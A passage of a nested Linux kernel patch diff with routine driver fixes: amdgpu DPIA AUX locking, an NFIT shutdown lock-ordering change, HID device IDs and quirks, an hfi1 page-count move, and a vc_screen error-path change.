+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb1_hsphy0>, <&usb1_ssphy0>;
+ };
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 2ca5418457ed2..2b1141645d9e1 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -161,7 +161,6 @@ config PPC
+ 	select ARCH_WANT_IRQS_OFF_ACTIVATE_MM
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+ 	select ARCH_WANTS_MODULES_DATA_IN_VMALLOC	if PPC_BOOK3S_32 || PPC_8xx
+-	select ARCH_WANTS_NO_INSTR
+ 	select ARCH_WEAK_RELEASE_ACQUIRE
+ 	select BINFMT_ELF
+ 	select BUILDTIME_TABLE_SORT
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index 347707d459c67..cbaf174d8efd9 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -123,6 +123,8 @@
+ #define INTEL_FAM6_METEORLAKE		0xAC
+ #define INTEL_FAM6_METEORLAKE_L		0xAA
+ 
++#define INTEL_FAM6_LUNARLAKE_M		0xBD
++
+ /* "Small Core" Processors (Atom/E-Core) */
+ 
+ #define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
+diff --git a/drivers/acpi/nfit/core.c b/drivers/acpi/nfit/core.c
+index ae5f4acf26753..6d4ac934cd499 100644
+--- a/drivers/acpi/nfit/core.c
++++ b/drivers/acpi/nfit/core.c
+@@ -3297,8 +3297,8 @@ void acpi_nfit_shutdown(void *data)
+ 
+ 	mutex_lock(&acpi_desc->init_mutex);
+ 	set_bit(ARS_CANCEL, &acpi_desc->scrub_flags);
+-	cancel_delayed_work_sync(&acpi_desc->dwork);
+ 	mutex_unlock(&acpi_desc->init_mutex);
++	cancel_delayed_work_sync(&acpi_desc->dwork);
+ 
+ 	/*
+ 	 * Bounce the nvdimm bus lock to make sure any in-flight
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index e9c4f22696c5c..a930b1873f2a4 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -147,14 +147,6 @@ MODULE_FIRMWARE(FIRMWARE_NAVI12_DMCU);
+ /* Number of bytes in PSP footer for firmware. */
+ #define PSP_FOOTER_BYTES 0x100
+ 
+-/*
+- * DMUB Async to Sync Mechanism Status
+- */
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_FAIL 1
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_TIMEOUT 2
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS 3
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_INVALID 4
+-
+ /**
+  * DOC: overview
+  *
+@@ -1456,6 +1448,7 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	memset(&init_params, 0, sizeof(init_params));
+ #endif
+ 
++	mutex_init(&adev->dm.dpia_aux_lock);
+ 	mutex_init(&adev->dm.dc_lock);
+ 	mutex_init(&adev->dm.audio_lock);
+ 	spin_lock_init(&adev->dm.vblank_lock);
+@@ -1816,6 +1809,7 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 
+ 	mutex_destroy(&adev->dm.audio_lock);
+ 	mutex_destroy(&adev->dm.dc_lock);
++	mutex_destroy(&adev->dm.dpia_aux_lock);
+ 
+ 	return;
+ }
+@@ -10200,91 +10194,95 @@ uint32_t dm_read_reg_func(const struct dc_context *ctx, uint32_t address,
+ 	return value;
+ }
+ 
+-static int amdgpu_dm_set_dmub_async_sync_status(bool is_cmd_aux,
+-						struct dc_context *ctx,
+-						uint8_t status_type,
+-						uint32_t *operation_result)
++int amdgpu_dm_process_dmub_aux_transfer_sync(
++		struct dc_context *ctx,
++		unsigned int link_index,
++		struct aux_payload *payload,
++		enum aux_return_code_type *operation_result)
+ {
+ 	struct amdgpu_device *adev = ctx->driver_context;
+-	int return_status = -1;
+ 	struct dmub_notification *p_notify = adev->dm.dmub_notify;
++	int ret = -1;
+ 
+-	if (is_cmd_aux) {
+-		if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS) {
+-			return_status = p_notify->aux_reply.length;
+-			*operation_result = p_notify->result;
+-		} else if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_TIMEOUT) {
+-			*operation_result = AUX_RET_ERROR_TIMEOUT;
+-		} else if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_FAIL) {
+-			*operation_result = AUX_RET_ERROR_ENGINE_ACQUIRE;
+-		} else if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_INVALID) {
+-			*operation_result = AUX_RET_ERROR_INVALID_REPLY;
+-		} else {
+-			*operation_result = AUX_RET_ERROR_UNKNOWN;
++	mutex_lock(&adev->dm.dpia_aux_lock);
++	if (!dc_process_dmub_aux_transfer_async(ctx->dc, link_index, payload)) {
++		*operation_result = AUX_RET_ERROR_ENGINE_ACQUIRE;
++		goto out;
++ 	}
++
++	if (!wait_for_completion_timeout(&adev->dm.dmub_aux_transfer_done, 10 * HZ)) {
++		DRM_ERROR("wait_for_completion_timeout timeout!");
++		*operation_result = AUX_RET_ERROR_TIMEOUT;
++		goto out;
++	}
++
++	if (p_notify->result != AUX_RET_SUCCESS) {
++		/*
++		 * Transient states before tunneling is enabled could
++		 * lead to this error. We can ignore this for now.
++		 */
++		if (p_notify->result != AUX_RET_ERROR_PROTOCOL_ERROR) {
++			DRM_WARN("DPIA AUX failed on 0x%x(%d), error %d\n",
++					payload->address, payload->length,
++					p_notify->result);
+ 		}
+-	} else {
+-		if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS) {
+-			return_status = 0;
+-			*operation_result = p_notify->sc_status;
+-		} else {
+-			*operation_result = SET_CONFIG_UNKNOWN_ERROR;
++		*operation_result = AUX_RET_ERROR_INVALID_REPLY;
++		goto out;
++	}
++
++
++	payload->reply[0] = adev->dm.dmub_notify->aux_reply.command;
++	if (!payload->write && p_notify->aux_reply.length &&
++			(payload->reply[0] == AUX_TRANSACTION_REPLY_AUX_ACK)) {
++
++		if (payload->length != p_notify->aux_reply.length) {
++			DRM_WARN("invalid read length %d from DPIA AUX 0x%x(%d)!\n",
++				p_notify->aux_reply.length,
++					payload->address, payload->length);
++			*operation_result = AUX_RET_ERROR_INVALID_REPLY;
++			goto out;
+ 		}
++
++		memcpy(payload->data, p_notify->aux_reply.data,
++				p_notify->aux_reply.length);
+ 	}
+ 
+-	return return_status;
++	/* success */
++	ret = p_notify->aux_reply.length;
++	*operation_result = p_notify->result;
++out:
++	reinit_completion(&adev->dm.dmub_aux_transfer_done);
++	mutex_unlock(&adev->dm.dpia_aux_lock);
++	return ret;
+ }
+ 
+-int amdgpu_dm_process_dmub_aux_transfer_sync(bool is_cmd_aux, struct dc_context *ctx,
+-	unsigned int link_index, void *cmd_payload, void *operation_result)
++int amdgpu_dm_process_dmub_set_config_sync(
++		struct dc_context *ctx,
++		unsigned int link_index,
++		struct set_config_cmd_payload *payload,
++		enum set_config_status *operation_result)
+ {
+ 	struct amdgpu_device *adev = ctx->driver_context;
+-	int ret = 0;
++	bool is_cmd_complete;
++	int ret;
+ 
+-	if (is_cmd_aux) {
+-		dc_process_dmub_aux_transfer_async(ctx->dc,
+-			link_index, (struct aux_payload *)cmd_payload);
+-	} else if (dc_process_dmub_set_config_async(ctx->dc, link_index,
+-					(struct set_config_cmd_payload *)cmd_payload,
+-					adev->dm.dmub_notify)) {
+-		return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux,
+-					ctx, DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS,
+-					(uint32_t *)operation_result);
+-	}
++	mutex_lock(&adev->dm.dpia_aux_lock);
++	is_cmd_complete = dc_process_dmub_set_config_async(ctx->dc,
++			link_index, payload, adev->dm.dmub_notify);
+ 
+-	ret = wait_for_completion_timeout(&adev->dm.dmub_aux_transfer_done, 10 * HZ);
+-	if (ret == 0) {
++	if (is_cmd_complete || wait_for_completion_timeout(&adev->dm.dmub_aux_transfer_done, 10 * HZ)) {
++		ret = 0;
++		*operation_result = adev->dm.dmub_notify->sc_status;
++	} else {
+ 		DRM_ERROR("wait_for_completion_timeout timeout!");
+-		return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux,
+-				ctx, DMUB_ASYNC_TO_SYNC_ACCESS_TIMEOUT,
+-				(uint32_t *)operation_result);
+-	}
+-
+-	if (is_cmd_aux) {
+-		if (adev->dm.dmub_notify->result == AUX_RET_SUCCESS) {
+-			struct aux_payload *payload = (struct aux_payload *)cmd_payload;
+-
+-			payload->reply[0] = adev->dm.dmub_notify->aux_reply.command;
+-			if (!payload->write && adev->dm.dmub_notify->aux_reply.length &&
+-			    payload->reply[0] == AUX_TRANSACTION_REPLY_AUX_ACK) {
+-
+-				if (payload->length != adev->dm.dmub_notify->aux_reply.length) {
+-					DRM_WARN("invalid read from DPIA AUX %x(%d) got length %d!\n",
+-							payload->address, payload->length,
+-							adev->dm.dmub_notify->aux_reply.length);
+-					return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux, ctx,
+-							DMUB_ASYNC_TO_SYNC_ACCESS_INVALID,
+-							(uint32_t *)operation_result);
+-				}
+-
+-				memcpy(payload->data, adev->dm.dmub_notify->aux_reply.data,
+-				       adev->dm.dmub_notify->aux_reply.length);
+-			}
+-		}
++		ret = -1;
++		*operation_result = SET_CONFIG_UNKNOWN_ERROR;
+ 	}
+ 
+-	return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux,
+-			ctx, DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS,
+-			(uint32_t *)operation_result);
++	if (!is_cmd_complete)
++		reinit_completion(&adev->dm.dmub_aux_transfer_done);
++	mutex_unlock(&adev->dm.dpia_aux_lock);
++	return ret;
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+index 635c398fcefe7..ac26e917240b9 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+@@ -59,7 +59,9 @@
+ #include "signal_types.h"
+ #include "amdgpu_dm_crc.h"
+ struct aux_payload;
++struct set_config_cmd_payload;
+ enum aux_return_code_type;
++enum set_config_status;
+ 
+ /* Forward declarations */
+ struct amdgpu_device;
+@@ -549,6 +551,13 @@ struct amdgpu_display_manager {
+ 	 * occurred on certain intel platform
+ 	 */
+ 	bool aux_hpd_discon_quirk;
++
++	/**
++	 * @dpia_aux_lock:
++	 *
++	 * Guards access to DPIA AUX
++	 */
++	struct mutex dpia_aux_lock;
+ };
+ 
+ enum dsc_clock_force_state {
+@@ -792,9 +801,11 @@ void amdgpu_dm_update_connector_after_detect(
+ 
+ extern const struct drm_encoder_helper_funcs amdgpu_dm_encoder_helper_funcs;
+ 
+-int amdgpu_dm_process_dmub_aux_transfer_sync(bool is_cmd_aux,
+-					struct dc_context *ctx, unsigned int link_index,
+-					void *payload, void *operation_result);
++int amdgpu_dm_process_dmub_aux_transfer_sync(struct dc_context *ctx, unsigned int link_index,
++					struct aux_payload *payload, enum aux_return_code_type *operation_result);
++
++int amdgpu_dm_process_dmub_set_config_sync(struct dc_context *ctx, unsigned int link_index,
++					struct set_config_cmd_payload *payload, enum set_config_status *operation_result);
+ 
+ bool check_seamless_boot_capability(struct amdgpu_device *adev);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 16623f73ddbe6..57454967617f8 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -844,9 +844,8 @@ int dm_helper_dmub_aux_transfer_sync(
+ 		struct aux_payload *payload,
+ 		enum aux_return_code_type *operation_result)
+ {
+-	return amdgpu_dm_process_dmub_aux_transfer_sync(true, ctx,
+-			link->link_index, (void *)payload,
+-			(void *)operation_result);
++	return amdgpu_dm_process_dmub_aux_transfer_sync(ctx, link->link_index, payload,
++			operation_result);
+ }
+ 
+ int dm_helpers_dmub_set_config_sync(struct dc_context *ctx,
+@@ -854,9 +853,8 @@ int dm_helpers_dmub_set_config_sync(struct dc_context *ctx,
+ 		struct set_config_cmd_payload *payload,
+ 		enum set_config_status *operation_result)
+ {
+-	return amdgpu_dm_process_dmub_aux_transfer_sync(false, ctx,
+-			link->link_index, (void *)payload,
+-			(void *)operation_result);
++	return amdgpu_dm_process_dmub_set_config_sync(ctx, link->link_index, payload,
++			operation_result);
+ }
+ 
+ void dm_set_dcn_clocks(struct dc_context *ctx, struct dc_clocks *clks)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index a0741794db62a..8e824dc81dede 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -391,3 +391,27 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 		pipe_ctx->stream_res.stream_enc->funcs->set_input_mode(pipe_ctx->stream_res.stream_enc,
+ 				pix_per_cycle);
+ }
++
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
++{
++	struct dc_context *ctx = hws->ctx;
++	union dmub_rb_cmd cmd;
++
++	if (hws->ctx->dc->debug.disable_hubp_power_gate)
++		return;
++
++	PERF_TRACE();
++
++	memset(&cmd, 0, sizeof(cmd));
++	cmd.domain_control.header.type = DMUB_CMD__VBIOS;
++	cmd.domain_control.header.sub_type = DMUB_CMD__VBIOS_DOMAIN_CONTROL;
++	cmd.domain_control.header.payload_bytes = sizeof(cmd.domain_control.data);
++	cmd.domain_control.data.inst = hubp_inst;
++	cmd.domain_control.data.power_gate = !power_on;
++
++	dc_dmub_srv_cmd_queue(ctx->dmub_srv, &cmd);
++	dc_dmub_srv_cmd_execute(ctx->dmub_srv);
++	dc_dmub_srv_wait_idle(ctx->dmub_srv);
++
++	PERF_TRACE();
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index 244280298212c..c419d3dbdfee6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -41,4 +41,6 @@ unsigned int dcn314_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsig
+ 
+ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 5b6c2d94ec71d..343f4d9dd5e34 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,7 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
+-	.hubp_pg_control = dcn31_hubp_pg_control,
++	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+ 	.dsc_pg_control = dcn314_dsc_pg_control,
+diff --git a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+index 7a8f61517424c..27a4ea7dc74ec 100644
+--- a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
++++ b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+@@ -450,6 +450,10 @@ enum dmub_cmd_vbios_type {
+ 	 * Query DP alt status on a transmitter.
+ 	 */
+ 	DMUB_CMD__VBIOS_TRANSMITTER_QUERY_DP_ALT  = 26,
++	/**
++	 * Controls domain power gating
++	 */
++	DMUB_CMD__VBIOS_DOMAIN_CONTROL = 28,
+ };
+ 
+ //==============================================================================
+@@ -1191,6 +1195,23 @@ struct dmub_rb_cmd_dig1_transmitter_control {
+ 	union dmub_cmd_dig1_transmitter_control_data transmitter_control; /**< payload */
+ };
+ 
++/**
++ * struct dmub_rb_cmd_domain_control_data - Data for DOMAIN power control
++ */
++struct dmub_rb_cmd_domain_control_data {
++	uint8_t inst : 6; /**< DOMAIN instance to control */
++	uint8_t power_gate : 1; /**< 1=power gate, 0=power up */
++	uint8_t reserved[3]; /**< Reserved for future use */
++};
++
++/**
++ * struct dmub_rb_cmd_domain_control - Controls DOMAIN power gating
++ */
++struct dmub_rb_cmd_domain_control {
++	struct dmub_cmd_header header; /**< header */
++	struct dmub_rb_cmd_domain_control_data data; /**< payload */
++};
++
+ /**
+  * DPIA tunnel command parameters.
+  */
+@@ -3187,6 +3208,10 @@ union dmub_rb_cmd {
+ 	 * Definition of a DMUB_CMD__VBIOS_DIG1_TRANSMITTER_CONTROL command.
+ 	 */
+ 	struct dmub_rb_cmd_dig1_transmitter_control dig1_transmitter_control;
++	/**
++	 * Definition of a DMUB_CMD__VBIOS_DOMAIN_CONTROL command.
++	 */
++	struct dmub_rb_cmd_domain_control domain_control;
+ 	/**
+ 	 * Definition of a DMUB_CMD__PSR_SET_VERSION command.
+ 	 */
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 3e1803592bd4a..5c72aef3d3dd5 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -1202,6 +1202,7 @@ int hid_open_report(struct hid_device *device)
+ 	__u8 *end;
+ 	__u8 *next;
+ 	int ret;
++	int i;
+ 	static int (*dispatch_type[])(struct hid_parser *parser,
+ 				      struct hid_item *item) = {
+ 		hid_parser_main,
+@@ -1252,6 +1253,8 @@ int hid_open_report(struct hid_device *device)
+ 		goto err;
+ 	}
+ 	device->collection_size = HID_DEFAULT_NUM_COLLECTIONS;
++	for (i = 0; i < HID_DEFAULT_NUM_COLLECTIONS; i++)
++		device->collection[i].parent_idx = -1;
+ 
+ 	ret = -EINVAL;
+ 	while ((next = fetch_item(start, end, &item)) != NULL) {
+diff --git a/drivers/hid/hid-elecom.c b/drivers/hid/hid-elecom.c
+index e59e9911fc370..4fa45ee77503b 100644
+--- a/drivers/hid/hid-elecom.c
++++ b/drivers/hid/hid-elecom.c
+@@ -12,6 +12,7 @@
+  *  Copyright (c) 2017 Alex Manoussakis <amanou@gnu.org>
+  *  Copyright (c) 2017 Tomasz Kramkowski <tk@the-tk.com>
+  *  Copyright (c) 2020 YOSHIOKA Takuma <lo48576@hard-wi.red>
++ *  Copyright (c) 2022 Takahiro Fujii <fujii@xaxxi.net>
+  */
+ 
+ /*
+@@ -89,7 +90,7 @@ static __u8 *elecom_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 	case USB_DEVICE_ID_ELECOM_M_DT1URBK:
+ 	case USB_DEVICE_ID_ELECOM_M_DT1DRBK:
+ 	case USB_DEVICE_ID_ELECOM_M_HT1URBK:
+-	case USB_DEVICE_ID_ELECOM_M_HT1DRBK:
++	case USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D:
+ 		/*
+ 		 * Report descriptor format:
+ 		 * 12: button bit count
+@@ -99,6 +100,16 @@ static __u8 *elecom_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		 */
+ 		mouse_button_fixup(hdev, rdesc, *rsize, 12, 30, 14, 20, 8);
+ 		break;
++	case USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C:
++		/*
++		 * Report descriptor format:
++		 * 22: button bit count
++		 * 30: padding bit count
++		 * 24: button report size
++		 * 16: button usage maximum
++		 */
++		mouse_button_fixup(hdev, rdesc, *rsize, 22, 30, 24, 16, 8);
++		break;
+ 	}
+ 	return rdesc;
+ }
+@@ -112,7 +123,8 @@ static const struct hid_device_id elecom_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1URBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1DRBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1URBK) },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C) },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(hid, elecom_devices);
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 0f8c11842a3a5..9e36b4cd905ee 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -413,6 +413,8 @@
+ #define I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100	0x29CF
+ #define I2C_DEVICE_ID_HP_ENVY_X360_EU0009NV	0x2CF9
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_15	0x2817
++#define I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG  0x29DF
++#define I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN 0x2BC8
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+ #define I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN	0x261A
+@@ -428,7 +430,8 @@
+ #define USB_DEVICE_ID_ELECOM_M_DT1URBK	0x00fe
+ #define USB_DEVICE_ID_ELECOM_M_DT1DRBK	0x00ff
+ #define USB_DEVICE_ID_ELECOM_M_HT1URBK	0x010c
+-#define USB_DEVICE_ID_ELECOM_M_HT1DRBK	0x010d
++#define USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D	0x010d
++#define USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C	0x011c
+ 
+ #define USB_VENDOR_ID_DREAM_CHEEKY	0x1d34
+ #define USB_DEVICE_ID_DREAM_CHEEKY_WN	0x0004
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 3ee5a9fea20e6..7e94ca1822afb 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -370,6 +370,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_DINOVO_EDGE_KBD),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+@@ -384,6 +386,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_SPECTRE_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_SURFACE_GO2_TOUCHSCREEN),
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index be3ad02573de8..5bc91f68b3747 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -393,7 +393,8 @@ static const struct hid_device_id hid_have_special_driver[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1URBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_DT1DRBK) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1URBK) },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_010D) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_ELECOM, USB_DEVICE_ID_ELECOM_M_HT1DRBK_011C) },
+ #endif
+ #if IS_ENABLED(CONFIG_HID_ELO)
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELO, 0x0009) },
+diff --git a/drivers/infiniband/hw/hfi1/user_exp_rcv.c b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+index b02f2f0809c81..350884d5f0896 100644
+--- a/drivers/infiniband/hw/hfi1/user_exp_rcv.c
++++ b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+@@ -160,16 +160,11 @@ static void unpin_rcv_pages(struct hfi1_filedata *fd,
+ static int pin_rcv_pages(struct hfi1_filedata *fd, struct tid_user_buf *tidbuf)
+ {
+ 	int pinned;
+-	unsigned int npages;
++	unsigned int npages = tidbuf->npages;
+ 	unsigned long vaddr = tidbuf->vaddr;
+ 	struct page **pages = NULL;
+ 	struct hfi1_devdata *dd = fd->uctxt->dd;
+ 
+-	/* Get the number of pages the user buffer spans */
+-	npages = num_user_pages(vaddr, tidbuf->length);
+-	if (!npages)
+-		return -EINVAL;
+-
+ 	if (npages > fd->uctxt->expected_count) {
+ 		dd_dev_err(dd, "Expected buffer too big\n");
+ 		return -EINVAL;
+@@ -196,7 +191,6 @@ static int pin_rcv_pages(struct hfi1_filedata *fd, struct tid_user_buf *tidbuf)
+ 		return pinned;
+ 	}
+ 	tidbuf->pages = pages;
+-	tidbuf->npages = npages;
+ 	fd->tid_n_pinned += pinned;
+ 	return pinned;
+ }
+@@ -274,6 +268,7 @@ int hfi1_user_exp_rcv_setup(struct hfi1_filedata *fd,
+ 	mutex_init(&tidbuf->cover_mutex);
+ 	tidbuf->vaddr = tinfo->vaddr;
+ 	tidbuf->length = tinfo->length;
++	tidbuf->npages = num_user_pages(tidbuf->vaddr, tidbuf->length);
+ 	tidbuf->psets = kcalloc(uctxt->expected_count, sizeof(*tidbuf->psets),
+ 				GFP_KERNEL);
+ 	if (!tidbuf->psets) {
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 9bc6e3922e78e..32c3edaf90385 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -365,6 +365,7 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 
+ 			} else {
+ 				debounce_enable = "  ∅";
++				time = 0;
+ 			}
+ 			snprintf(debounce_value, sizeof(debounce_value), "%u", time * unit);
+ 			seq_printf(s, "debounce %s (🕑 %sus)| ", debounce_enable, debounce_value);
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index f566eb1839dc5..71e091f879f0e 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -403,10 +403,11 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		unsigned int this_round, skip = 0;
+ 		int size;
+ 
+-		ret = -ENXIO;
+ 		vc = vcs_vc(inode, &viewed);
+-		if (!vc)
+-			goto unlock_out;
++		if (!vc) {
++			ret = -ENXIO;
++			break;
++		}
+ 
+ 		/* Check whether we are above size each round,
+ 		 * as copy_to_user at the end of this loop
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 0aaaadb02cc69..1abe43ddb75f0 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2389,9 +2389,8 @@ static int usb_enumerate_device_otg(struct usb_device *udev)
